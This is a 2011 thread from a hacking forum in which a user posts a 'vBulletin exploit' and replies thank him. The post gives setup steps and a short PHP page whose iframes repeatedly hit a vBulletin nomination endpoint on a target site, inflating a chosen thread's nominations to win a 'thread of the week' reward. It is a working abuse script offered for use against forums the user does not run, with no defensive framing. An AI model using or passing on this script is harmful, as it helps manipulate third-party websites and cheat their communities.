Sinisterly
VBulletin Exploit. - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: VBulletin Exploit. (/Thread-VBulletin-Exploit)



VBulletin Exploit. - Coded32 - 06-01-2011

All the credits goes to RodneyTrotter for the exploit.



What does it do:

- This glitches the site and nominates a thread 4billlion times, therefore you're guaranteed to win the TOTW and earn whatever rep they give a way.

A Thread about it :
Code:
http://www.nextgenupdate.com/forums/reso...-week.html

And here's a screenshot:

[Image: PROjce.png]

How to:

- Download xampp because we're using a PHP script.
- Install xampp and add the file bellow into htdocs
- Create a file called index.php and add the code bellow:

Code:
<?php $siteurl = "http://vb.site"; $threadid = "657"; ?> <html> <title>VB Exploit found by RodneyTrotter</title> <!---- http://tiptopgamers.com ----> <iframe src="<?php echo $siteurl; ?>/nominate_topic.php?do=nominate_topic_add_user&p=<?php echo $threadid; ?>"></iframe> <iframe src="<?php echo $siteurl; ?>/nominate_topic.php?do=nominate_topic_remove_user&p=<?php echo $threadid; ?>"></iframe> </html>

- Just edit the site url to whatever site allows it, and change the thread id to the id of the thread.
- Now that's done, just keep refreshing http://localhost/index.php 'till it works.

The author of the Exploit wants you to leave a Copyright wherever you Post this, as I have already done in the Credits. -Coded32

Thanks.



RE: VBulletin Exploit. - The Great White - 06-02-2011

Looks interesting mate, Ill check it out. Thanks for the share!


RE: VBulletin Exploit. - Coded32 - 06-04-2011

I will Post more on it.
Wait for an update.